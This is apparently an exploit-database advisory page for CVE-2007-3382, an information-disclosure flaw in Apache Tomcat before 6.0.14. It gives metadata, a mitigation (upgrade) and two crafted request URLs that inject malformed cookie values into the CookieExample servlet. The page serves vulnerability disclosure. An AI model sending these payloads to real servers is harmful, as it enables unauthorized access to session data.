header-logo
Suggest Exploit
vendor:
Tomcat
by:
Unknown
5.5
CVSS
MEDIUM
Information Disclosure
200
CWE
Product Name: Tomcat
Affected Version From: Prior to Apache Tomcat 6.0.14
Affected Version To:
Patch Exists: YES
Related CWE: CVE-2007-3382
CPE: a:apache:tomcat
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0602/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0195/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0876/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0950/https://www.rapid7.com/db/vulnerabilities/http-apache-tomcat-cookie-session-id-disclosure/https://www.rapid7.com/db/vulnerabilities/apple-osx-tomcat-cve-2007-3382/https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2007-3382/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-0871/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0871/https://www.rapid7.com/db/vulnerabilities/suse-cve-2007-3382/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0261/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-1069/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0524/
Other Scripts:
Platforms Tested:
2007

Apache Tomcat Information Disclosure Vulnerabilities

Apache Tomcat is prone to multiple information-disclosure vulnerabilities because it fails to adequately sanitize user-supplied data. Attackers can exploit these issues to access potentially sensitive data that may aid in further attacks.

Mitigation:

Upgrade to Apache Tomcat 6.0.14 or later version.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25316/info

Apache Tomcat is prone to multiple information-disclosure vulnerabilities because it fails to adequately sanitize user-supplied data.

Attackers can exploit these issues to access potentially sensitive data that may aid in further attacks.

Versions prior to Apache Tomcat 6.0.14 are vulnerable. 

http://www.example.com:8080/examples/servlets/servlet/CookieExample?cookiename=HAHA&cookievalue=%5C%22FOO%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%3B+Path%3D%2F%3B

http://www.example.com:8080/servlets-examples/servlet/CookieExample?cookiename=BLOCKER&cookievalue=%5C%22A%3D%27%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%3B+Path%3D%2Fservlets-examples%2Fservlet+%3B

Navigation

Suggest Exploit

Services By CQR